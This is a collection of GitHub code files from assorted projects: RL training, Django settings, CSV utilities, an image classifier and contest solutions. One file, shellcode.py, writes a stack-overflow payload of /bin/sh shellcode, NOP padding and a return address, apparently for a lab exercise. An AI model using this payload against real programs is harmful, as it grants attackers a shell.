self.model.state_dict()\n }, path)\n\n def load(self, path):\n checkpoint = torch.load(path)\n state_dict = checkpoint.get('state_dict', checkpoint)\n self.model.load_state_dict(state_dict)\n\n def update(self, states, actions, cumulative_rewards, dones=None):\n states = torch.tensor(states).to(device, torch.float)\n actions = torch.tensor(actions).to(device, torch.float)\n cumulative_returns = torch.tensor(cumulative_rewards).to(device, torch.float)\n\n # predict logits, probas and log-probas using an agent.\n logits, values = self.model(states)\n probas = F.softmax(logits, dim=1)\n logprobas = F.log_softmax(logits, dim=1)\n\n # REINFORCE objective function\n self.optimizer.zero_grad()\n rewards_with_baseline = cumulative_returns - values.squeeze(1)\n policy_loss = reinforce_loss(logprobas, actions, rewards_with_baseline)\n value_loss = F.smooth_l1_loss(values, cumulative_returns.unsqueeze(1))\n entropy = torch.mean(-torch.sum(logprobas * probas, dim=1))\n loss = policy_loss + self.value_loss_coef * value_loss + self.entropy_coef * entropy\n loss.backward()\n self.optimizer.step()\n\n return loss, policy_loss, value_loss, entropy\n\n def get_action(self, state):\n with torch.no_grad():\n logits, _ = self.model(torch.tensor(state).to(device, torch.float))\n dist = Categorical(F.softmax(logits, dim=1))\n sample = dist.sample()\n return sample.detach().cpu().numpy()\n\n def get_value(self, state):\n with torch.no_grad():\n _, values = self.model(torch.tensor(state).to(device, torch.float))\n return values.detach().cpu().numpy()\n\n\nclass MLPPolicy(nn.Module):\n def __init__(self, observation_space, action_space):\n super(MLPPolicy, self).__init__()\n\n self.logits = nn.Sequential(\n nn.Linear(*obesrvation_shape(observation_space), 64),\n nn.ReLU(),\n nn.Linear(64, 64),\n nn.ReLU(),\n nn.Linear(64, action_space.n)\n )\n\n self.state_values = nn.Sequential(\n nn.Linear(*obesrvation_shape(observation_space), 64),\n nn.ReLU(),\n nn.Linear(64, 64),\n nn.ReLU(),\n nn.Linear(64, 1)\n )\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n return self.logits(x), self.state_values(x)\n\n\ndef to_one_hot(y, n_dims=None):\n \"\"\" Take an integer vector (tensor of variable) and convert it to 1-hot matrix. \"\"\"\n y_tensor = y.to(torch.long).view(-1, 1)\n n_dims = n_dims if n_dims is not None else int(torch.max(y_tensor)) + 1\n y_one_hot = y_tensor.new_zeros(y_tensor.size(0), n_dims).scatter_(1, y_tensor, 1)\n return y_one_hot\n\n\ndef train(agent, env, args, max_reward=200):\n total_rewars = []\n for i in range(1, args.num_steps + 1):\n states, actions, rewards, dones, lastvalues = generate_session_batch(agent, env, args.episode_length)\n\n # get cumulative rewards\n # use fictive reward for handling unfinished sessions\n rewards_ = np.c_[rewards, lastvalues]\n dones_ = np.c_[dones, np.zeros(dones.shape[0])]\n cumulative_rewards = get_cumulative_rewards(rewards_, agent.gamma, dones=dones_)[:, :-1]\n\n # reshape sessions to form a batch\n batch_size = env.num_envs * args.episode_length\n states = states.reshape((batch_size,) + env.observation_space.shape)\n actions = actions.reshape((batch_size,))\n cumulative_rewards = cumulative_rewards.reshape((batch_size,))\n dones = dones.reshape((batch_size,))\n\n # update policy on a batch\n losses = agent.update(states, actions, cumulative_rewards, dones)\n # note that last session reward is truncated\n total_rewars.extend(get_total_rewards(rewards, dones))\n\n current_mean_reward = np.mean(total_rewars[-100:])\n if i % 100 == 0:\n print(\"Iteration: %i, Mean reward:%.3f\" % (i, current_mean_reward))\n if current_mean_reward > max_reward:\n return\n","repo_name":"vadimadr/reinforcement_learning","sub_path":"a2c/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39952013727","text":"from textwrap import dedent\n\nfrom weaveio.data import Data\nfrom weaveio.hierarchy import Hierarchy, Multiple\n\n\nclass CASU(Hierarchy):\n idname = 'id'\n\nclass Run(Hierarchy):\n idname = 'id'\n\nclass RawSpectrum(Hierarchy):\n parents = [CASU, Run]\n identifier_builder = ['casu', 'run']\n\n\n\ndata = Data(dbname='lowleveltest')\ndata.hierarchies = {CASU, Run, RawSpectrum}\nwith data.write:\n # data.drop_all_constraints(indexes=True)\n # data.apply_constraints() # needed here because we're doing it ourselves\n with data.write_cypher('ignore') as query:\n casu = CASU(id=1)\n run = Run(id=1)\n raw = RawSpectrum(casu=casu, run=run)\n\n cypher, params = query.render_query()\n print(dedent(cypher))\n # results = data.graph.execute(cypher, **params)","repo_name":"philastrophist/weave-io","sub_path":"merge_test.py","file_name":"merge_test.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21221710357","text":"# coding: utf-8\n\nimport os\nimport codecs\n\n\ndef load_csv(file_path):\n _csv_list = []\n _file = codecs.open(file_path)\n\n try:\n _data = _file.read()\n if _data[:3] == codecs.BOM_UTF8:\n _data = _data[3:]\n _lines = _data.splitlines()\n _merge_line = \"\"\n _line_index = 0\n for i in range(len(_lines)):\n _merge_line += _lines[i] + \"\\n\"\n if _merge_line.count('\"') % 2 == 0:\n _column_list = []\n _columns = _merge_line.strip(\"\\n\").split(\",\")\n _merge_column = \"\"\n for _col in _columns:\n _merge_column += _col + \",\"\n if _merge_column.count('\"') % 2 == 0:\n _column_list.append(_merge_column.strip(\",\").strip('\"'))\n _merge_column = \"\"\n _csv_list.append(_column_list)\n # _csv_list[_line_index].append()\n _merge_line = \"\"\n _line_index += 1\n return _csv_list\n\n finally:\n if _file is not None:\n _file.close()\n\n\ndef get_files(directory, extension=\".json\"):\n \"\"\"\n Get files from the directory\n :param directory: the directory\n :param extension: the file extension\n :return: the files\n \"\"\"\n if not os.path.isdir(directory):\n raise Exception(\"The param 'directory' should be a directory\")\n\n _file_list = []\n for _item in os.listdir(directory):\n _item_full_path = os.path.join(directory, _item)\n if os.path.isdir(_item_full_path):\n for _file in get_files(os.path.join(directory, _item), extension):\n _file_list.append(_file)\n else:\n _name, _extension = os.path.splitext(_item_full_path)\n if _extension.lower() == extension.lower():\n _file_list.append(_item_full_path)\n\n return _file_list\n\n\ndef have_file(directory, file_name, extension=\".json\"):\n \"\"\"\n Check if the directory contains specified file\n :param directory: the directory\n :param file_name: the file name\n :param extension: the file extension\n :return: True or False\n \"\"\"\n for _file in get_files(directory, extension):\n if os.path.split(_file)[1].lower() == file_name.lower():\n return True\n\n return False\n","repo_name":"supor/label_UI","sub_path":"Framework/Test-Automation/framework/taf_utility.py","file_name":"taf_utility.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10349007430","text":"#!/usr/bin/python\n\nimport sys\nimport re\n\nlines = []\nmatch = 0\n\nfor line in sys.stdin:\n\tlines.append(line)\n\nfor line in lines:\n\tif \"{{title}}\" in line:\n\t\ttitle = \"Some Page :)\"\n\t\tfor c_line in lines:\n\t\t #DOC: finds first h2 and uses text inside as title\n\t\t\tif \"\" in c_line and match == 0:\n\t\t\t\ttitle = re.search(r\"[^<]+<\\/h2>\", c_line).group()[4:-5]\n\t\t\t\tmatch = 1\n\t\tline = line.replace(\"{{title}}\", title)\n\tsys.stdout.write(line)\n\n","repo_name":"flber/mx","sub_path":"plugins/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"}
+{"seq_id":"2829236314","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('goblin', '0002_projectlink'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='projectlink',\n name='type',\n field=models.CharField(default=datetime.datetime(2015, 4, 29, 21, 22, 3, 951741, tzinfo=utc), max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='projectlink',\n name='url',\n field=models.URLField(default='about:blank'),\n preserve_default=False,\n ),\n ]\n","repo_name":"src-r-r/django-project-goblin","sub_path":"goblin/migrations/0003_auto_20150429_1422.py","file_name":"0003_auto_20150429_1422.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"29318223057","text":"import sys\nimport tempfile\n\nfrom envprobe.community_descriptions import downloader, local_data\nfrom envprobe.vartypes import EnvVarExtendedInformation\n\n\nname = 'descriptions'\ndescription = \\\n \"\"\"\n The 'descriptions' subcommand allows access to the \"Envprobe Variable\n Descriptions Knowledge Base\" project.\n \"\"\"\nhelp = \"Access facilities related to the \\\"variable desciptions\\\" project\"\n\nupdate_name = 'update'\nupdate_description = \\\n \"\"\"\n Check if the descriptions project has a newer version available.\n If there is, the data will be downloaded and extracted and subsequent calls\n to Envprobe will behave according to the new information, if no\n user-specific settings exist.\n\n This command requires Internet access.\n \"\"\"\nupdate_help = \"Download varaible descriptions from the Internet.\"\n\nepilogue = \\\n \"\"\"\n The canonical repository for this sister project is avaiable at:\n http://github.com/whisperity/Envprobe-Descriptions\n \"\"\"\n\n\ndef update_command(args):\n print(\"Checking for latest version of the Envprobe Variable Descriptions \"\n \"Knowledge Base project.\")\n storage_cfg = local_data.get_storage_configuration(read_only=False)\n new_version = downloader.fetch_latest_version_information()\n\n if new_version == storage_cfg.version:\n # Right now, we use a simple equality check, because the versions are\n # pure commit IDs.\n print(\"Nothing to update - the latest data is already available.\")\n return\n\n # Open all the variable information managers for the saved data. This is\n # needed so we can gather which keys to delete.\n variables_to_clear = set()\n for manager in local_data.generate_variable_information_managers():\n variables_to_clear.update(manager.keys())\n\n with tempfile.TemporaryDirectory(prefix=\"envprobe-community-kb-\") as tempd:\n sources = downloader.download_latest_data(tempd)\n for source in sources:\n print(\"Extracting '{}'...\".format(source.name))\n try:\n source.parse()\n except Exception as e:\n print(\"[WARN] Failed to parse '{}':\\t{}\"\n .format(source.name, str(e)),\n file=sys.stderr)\n continue\n\n storage_cfg.set_comment_for(source.name, source.comment)\n set_vars = 0\n for variable in source:\n information = EnvVarExtendedInformation()\n information.apply(source[variable])\n\n try:\n manager = local_data.get_variable_information_manager(\n variable, read_only=False)\n manager.set(variable, information, source.name)\n set_vars += 1\n\n try:\n variables_to_clear.remove(variable)\n except KeyError:\n pass\n except Exception as e:\n print(\"[WARN] Failed to update configuration for \"\n \"'{}':\\t{}\".format(variable, str(e)),\n file=sys.stderr)\n continue\n print(\"\\textracted {} variables.\".format(set_vars))\n\n print(\"Cleaning up old information...\")\n set_vars = 0\n for variable in variables_to_clear:\n try:\n manager = local_data.get_variable_information_manager(\n variable, read_only=False)\n del manager[variable]\n set_vars += 1\n except Exception as e:\n print(\"[WARN] Failed to clean up '{}':\\t{}\".format(variable,\n str(e)),\n file=sys.stderr)\n print(\"\\tcleaned up {} records.\".format(set_vars))\n\n storage_cfg.version = new_version\n\n\ndef register_update(argparser):\n parser = argparser.add_parser(\n name=update_name,\n description=update_description,\n help=update_help,\n epilog=epilogue\n )\n\n parser.set_defaults(func=update_command)\n\n\ndef register(argparser, shell):\n parser = argparser.add_parser(\n name=name,\n description=description,\n help=help,\n epilog=epilogue\n )\n subparsers = parser.add_subparsers(\n title=\"available_commands\")\n\n register_update(subparsers)\n","repo_name":"whisperity/envprobe","sub_path":"src/envprobe/commands/descriptions.py","file_name":"descriptions.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"}
+{"seq_id":"33670279844","text":"\"\"\"\nBase settings to build other settings files upon.\n\"\"\"\nimport os\n\nfrom pathlib import Path\n\nimport environ\n\nfrom django.utils.translation import gettext_lazy as _\n\n\nROOT_DIR = Path(__file__).resolve(strict=True).parent.parent\nAPPS_DIR = ROOT_DIR / \"ghibil\"\nenv = environ.Env()\n\nREAD_DOT_ENV_FILE = env.bool(\"DJANGO_READ_DOT_ENV_FILE\", default=True)\nif READ_DOT_ENV_FILE:\n # OS environment variables take precedence over variables from .env\n env.read_env(str(ROOT_DIR / \".env\"))\n\n# GENERAL\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = env.bool(\"DJANGO_DEBUG\", False)\n# Local time zone. Choices are\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# though not all of them may be available with every OS.\n# In Windows, this must be set to your system time zone.\nTIME_ZONE = \"UTC\"\n# https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = \"en-us\"\n# https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#languages\nLANGUAGES = [(\"en-us\", _(\"English\")), (\"de-de\", _(\"German\"))]\n# https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths\nLOCALE_PATHS = [str(ROOT_DIR / \"locale\")]\n\n# DATABASES\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(ROOT_DIR, \"db.sqlite3\"),\n },\n}\n# URLS\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf\nROOT_URLCONF = \"config.urls\"\n\n# APPS\n# -----------------------------------------------------------------------------\nDJANGO_APPS = [\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"django.contrib.admin\",\n]\nTHIRD_PARTY_APPS = [\n \"rest_framework\",\n]\n\nLOCAL_APPS = [\n \"ghibil.movies.apps.MoviesAppConfig\",\n]\n# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n# MIDDLEWARE\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#middleware\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\n# TEMPLATES\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#templates\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\nSECRET_KEY = env(\n \"DJANGO_SECRET_KEY\",\n default=\"LJvMIEyCZ4lM9onk5EyhaeioR6R9CHJ3VaMiCsBepsA9ER6CQp1lNPIBRnX6Ax3h\",\n)\n# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\"]\n\n# CACHES\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#caches\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": env.get_value(\n var=\"REDIS_URL\", default=\"redis://127.0.0.1:6379/0\",\n ),\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n },\n}\nSTATIC_URL = \"/static/\"\n","repo_name":"abtinmo/ghibil","sub_path":"config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74863115741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 15 15:33:25 2017\n\n@author: oreilly\n\"\"\"\n\nfrom .modelingParameter import getParameterTypeNameFromID\n\n# Equivalence rules. These are define such that\n# parameterEquivalenceRules[idFrom][idTo] is giving a rule to convert\n# values from an entity idFrom to an entity idTo. This rule is specified as \n# a lambda function that that has to be applies to the values of the \n# given parameters.\nparameterEquivalenceRules = {}\n\n#\"BBP-131005\":volume_brain_region\n#\"BBP-131006\":volume_unilateral_brain_region\nparameterEquivalenceRules[\"BBP-131005\"] = {\"BBP-131006\":lambda x: x/2}\nparameterEquivalenceRules[\"BBP-131006\"] = {\"BBP-131005\":lambda x: x*2}\n\n\n\nclass EquivalenceFinder:\n \n def __init__(self, condition):\n self.condition = condition\n\n\n def run(self):\n # Apply rules for parameter equivalences\n return self.applyParameterEquivalence(self.condition)\n \n \n def applyParameterEquivalence(self, condition):\n \n for idFrom in parameterEquivalenceRules:\n for idTo in parameterEquivalenceRules[idFrom]:\n condition.addEquivalences(\"Parameter type ID\", idFrom, idTo, parameterEquivalenceRules[idFrom][idTo])\n condition.addEquivalences(\"Parameter name\", \n getParameterTypeNameFromID(idFrom), \n getParameterTypeNameFromID(idTo), \n parameterEquivalenceRules[idFrom][idTo])\n \n return condition","repo_name":"BlueBrain/nat","sub_path":"nat/equivalenceFinder.py","file_name":"equivalenceFinder.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"}
+{"seq_id":"27696572637","text":"### Load the data ###\n\nlabels = ['normal','abnormal']\nimage_size = 224\n\n# Borrowed \"get_data\" function from\n# https://www.analyticsvidhya.com/blog/2020/10/create-image-classification-model-python-keras/\n\nimport os \nimport cv2 \nimport numpy as np\n\ndef get_data(data_dir):\n data = []\n for label in labels:\n path = os.path.join(data_dir,label)\n class_num = labels.index(label)\n for img in os.listdir(path):\n try:\n img_arr = cv2.imread(os.path.join(path,img))[...,::-1] # Convert BGR to RGB format\n resized_arr = cv2.resize(img_arr, (image_size, image_size)) # Reshape images to preferred size\n data.append([resized_arr, class_num])\n except Exception as e:\n print(e)\n return np.array(data)\n\ntrain = get_data('../two_class_post_weld/train') ## define current path to the train folder\nval = get_data('../two_class_post_weld/test') ## define current path to the test folder\n\n### Compare the number of the images in both cases ###\n\nimport seaborn as sns\n\ncount_number = []\nfor i in train:\n if(i[1]==0):\n count_number.append(\"normal\")\n else:\n count_number.append(\"abnormal\")\n\nsns.set_style('whitegrid')\nsns.countplot(count_number)\n\n### Visualize a random image from both classes ###\n\nimport matplotlib.pyplot as plt\n\n# visualize a normal welding image\nplt.figure(figsize = (5,5))\nplt.imshow(train[1][0])\nplt.title(labels[train[0][1]])\n\n# visualize a abnormal welding image\nplt.figure(figsize = (5,5))\nplt.imshow(train[-1][0])\nplt.title(labels[train[-1][1]])\n\n### Data Preprocessing ###\n\n# split the data into feature and label\n\nx_train = []\ny_train = []\nx_val = []\ny_val = []\n\nfor feature, label in train:\n x_train.append(feature)\n y_train.append(label)\n\nfor feature, label in val:\n x_val.append(feature)\n y_val.append(label)\n\n# normalize the data\n\nimport numpy as np\n\nx_train = np.array(x_train) / 255\nx_val = np.array(x_val) / 255\n\nx_train.reshape(-1, image_size, image_size, 1)\ny_train = np.array(y_train)\n\nx_val.reshape(-1, image_size, image_size,1)\ny_val = np.array(y_val)\n\n# data augmentation \n\nfrom keras.preprocessing.image import ImageDataGenerator\n\ndata_generator = ImageDataGenerator(\n featurewise_center=False, # False to input mean zero\n samplewise_center=False, # False tosample mean zero\n featurewise_std_normalization=False, # False to divide input by its standard deviation\n samplewise_std_normalization=False, # False to divide sample by its standard deviation\n zca_whitening=False, # False to apply ZCA whitening\n rotation_range=25, # rotate images in 25 degree\n zoom_range=0.3, # zoom images 0.3 times\n width_shift_range=0.1, # shift images 0.1 horizontally (fraction of total width)\n height_shift_range=0.1, # shift images 0.1 vertically (fraction of total height)\n horizontal_flip=True, # flip images horizontally\n vertical_flip=True) # flip images vertically\n\ndata_generator.fit(x_train)\n\n### Build the model ###\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPool2D, Flatten, Dropout\n\nmodel = Sequential()\nmodel.add(Conv2D(8,3,padding=\"same\",activation=\"relu\",input_shape=(224,224,3)))\nmodel.add(MaxPool2D())\nmodel.add(Conv2D(16,3,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPool2D())\nmodel.add(Conv2D(32,3,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPool2D())\nmodel.add(Conv2D(64,3,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPool2D())\nmodel.add(Dropout(0.4))\n\nmodel.add(Flatten())\nmodel.add(Dense(128,activation=\"relu\"))\nmodel.add(Dense(2,activation=\"softmax\"))\n\nmodel.summary()\n\n### Evaluate the results ###\n\nimport tensorflow as tf\nfrom keras.optimizers import SGD, Adam\n\nopt = Adam(lr=0.000001)\nmodel.compile(optimizer=opt, loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=['accuracy'])\n\nhistory = model.fit(x_train, y_train, epochs=500, validation_data=(x_val,y_val))\n\nacc= history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(500)\n\nplt.figure(figsize=(15,15))\nplt.subplot(2,2,1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(2,2,2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\nfrom sklearn.metrics import classification_report\n\npredictions = model.predict_classes(x_val)\npredictions = predictions.reshape(1,-1)[0]\nprint(classification_report(y_val, predictions, target_names = ['normal welding (Class 0)','abnormal welding(Class 1)']))\n","repo_name":"ykim836/ECE","sub_path":"post_welding_code.py","file_name":"post_welding_code.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13695741484","text":"import argparse\nimport binascii\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"addr\", type=str)\nparser.add_argument(\"pad\", type=int)\n\ndef write_pld(addr, pad):\n\tfw = open('pld', 'wb')\n\t\n\t# Write shellcode\n\tfw.write(b'\\x31\\xc0')\n\tfw.write(b'\\x50')\n\tfw.write(b'\\x68\\x6e\\x2f\\x73\\x68')\n\tfw.write(b'\\x68\\x2f\\x2f\\x62\\x69')\n\tfw.write(b'\\x89\\xe3')\n\tfw.write(b'\\x99')\n\tfw.write(b'\\x52')\n\tfw.write(b'\\x56')\n\tfw.write(b'\\x89\\xe1')\n\tfw.write(b'\\xb0\\x0b')\n\tfw.write(b'\\xcd\\x80')\n\n\t# Write pad\n\tfor i in range(pad):\n\t\tfw.write(b'\\x90')\n\n\t# Convert and write addr\n\t# 0xabcdefgh -> \\xgh\\xef\\xcd\\xab\n\tformat_str = \"{gh}{ef}{cd}{ab}\"\n\taddr_formatted = format_str.format(ab=addr[:2],\n\t\t\t\t\t cd=addr[2:4],\n\t\t\t\t\t ef=addr[4:6],\n\t\t\t\t\t gh=addr[6:])\n\tprint(addr_formatted)\n\taddr_bytes = binascii.a2b_hex(addr_formatted)\n\tfw.write(addr_bytes)\n\n\tfw.close()\n\n\nif __name__ == '__main__':\n\targs = parser.parse_args()\n\taddr = args.addr\n\twhile len(addr) < 8:\n\t\taddr = \"0\" + addr\n\twrite_pld(addr, args.pad)\n\n","repo_name":"JaredDobry/brute_shellcode","sub_path":"shellcode.py","file_name":"shellcode.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72685341664","text":"from typing import Optional, List\nfrom collections import deque\nfrom BinaryTree.TreeNodeModule import TreeNode\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def zigzagLevelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n if not root:\n return []\n\n # node and depth\n queue = deque([(root, 1)])\n answer = []\n while queue:\n node, depth = queue.pop()\n if node.left:\n queue.appendleft((node.left, depth + 1))\n if node.right:\n queue.appendleft((node.right, depth + 1))\n \n if depth > len(answer):\n answer.append([])\n answer[-1].append(node.val)\n \n return [level if depth % 2 == 0 else list(reversed(level)) for depth, level in enumerate(answer)]\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/BinaryTree/BinaryTreeZigzagLevelOrderTraversal/BFS103.py","file_name":"BFS103.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
+{"seq_id":"94528515","text":"\"\"\" Python 3 compatibility tools. \"\"\"\nfrom __future__ import division, print_function\nimport itertools\nimport sys\nimport os\nfrom io import BytesIO, IOBase\n\n\nif sys.version_info[0] < 3:\n input = raw_input\n range = xrange\n\n filter = itertools.ifilter\n map = itertools.imap\n zip = itertools.izip\n\n\ndef is_it_local():\n script_dir = str(os.getcwd()).split('/')\n username = \"dipta007\"\n return username in script_dir\n\n\ndef READ(fileName):\n if is_it_local():\n sys.stdin = open(f'./{fileName}', 'r')\n\n# region fastio\nBUFSIZE = 8192\n\nclass FastIO(IOBase):\n newlines = 0\n\n def __init__(self, file):\n self._fd = file.fileno()\n self.buffer = BytesIO()\n self.writable = \"x\" in file.mode or \"r\" not in file.mode\n self.write = self.buffer.write if self.writable else None\n\n def read(self):\n while True:\n b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n if not b:\n break\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines = 0\n return self.buffer.read()\n\n def readline(self):\n while self.newlines == 0:\n b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n self.newlines = b.count(b\"\\n\") + (not b)\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines -= 1\n return self.buffer.readline()\n\n def flush(self):\n if self.writable:\n os.write(self._fd, self.buffer.getvalue())\n self.buffer.truncate(0), self.buffer.seek(0)\n\n\nclass IOWrapper(IOBase):\n def __init__(self, file):\n self.buffer = FastIO(file)\n self.flush = self.buffer.flush\n self.writable = self.buffer.writable\n self.write = lambda s: self.buffer.write(s.encode(\"ascii\"))\n self.read = lambda: self.buffer.read().decode(\"ascii\")\n self.readline = lambda: self.buffer.readline().decode(\"ascii\")\n\nif not is_it_local():\n sys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)\n input = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\n\n# endregion\n\n\ndef input1(type=int):\n return type(input())\n\n\ndef input2(type=int):\n [a, b] = list(map(type, input().split()))\n return a, b\n\n\ndef input3(type=int):\n [a, b, c] = list(map(type, input().split()))\n return a, b, c\n\n\ndef input_array(type=int):\n return list(map(type, input().split()))\n\n\ndef input_string():\n s = input()\n return list(s)\n\n##############################################################\n\ndef is_it_okay(st01, st10):\n return abs(st01 - st10) <= 1\n\ndef is_it_double(st, mp):\n if mp.get(st[::-1], 0) == 1:\n return True\n return False\n\ndef main():\n t = input1()\n for ci in range(t):\n n = input1()\n\n mat = []\n st01, st10 = 0, 0\n mp = {}\n for i in range(n):\n st = input()\n now = [st]\n mp[st] = 1\n\n if st[0] == '0' and st[-1] == '1':\n st01 += 1\n now.append(0)\n now.append(1)\n elif st[0] == '1' and st[-1] == '0':\n st10 += 1\n now.append(1)\n now.append(0)\n else:\n now.append(ord(st[0]) - 48)\n now.append(ord(st[-1]) - 48)\n \n mat.append(now)\n\n swapped = []\n # print(st01, st10)\n\n # No 0...1 or 1...0\n if st01 == 0 and st10 == 0:\n flg = 0\n nw = mat[0]\n for [st, a, b] in mat:\n if nw[1] != a or nw[2] != b:\n print(-1)\n flg = 1\n break\n if not flg:\n print(0)\n print(\"\")\n elif is_it_okay(st01, st10):\n print(0)\n print(\"\")\n else:\n for i, [s, a, b] in enumerate(mat):\n if st01 > st10 + 1 and a == 0 and b == 1 and not is_it_double(s, mp):\n swapped.append(i)\n mp[s] -= 1\n mp[s[::-1]] = 1\n st01 -= 1\n st10 += 1\n elif st10 > st01 + 1 and a == 1 and b == 0 and not is_it_double(s, mp):\n swapped.append(i)\n mp[s] -= 1\n mp[s[::-1]] = 1\n st10 -= 1\n st01 += 1\n\n if is_it_okay(st01, st10):\n print(len(swapped))\n print(\" \".join([str(x+1) for x in swapped]))\n else:\n print(-1)\n\n\n pass\n\nif __name__ == '__main__':\n # READ('in.txt')\n main()","repo_name":"dipta007/Competitive-Programming","sub_path":"Codeforces/Practice/1277D.py","file_name":"1277D.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"}
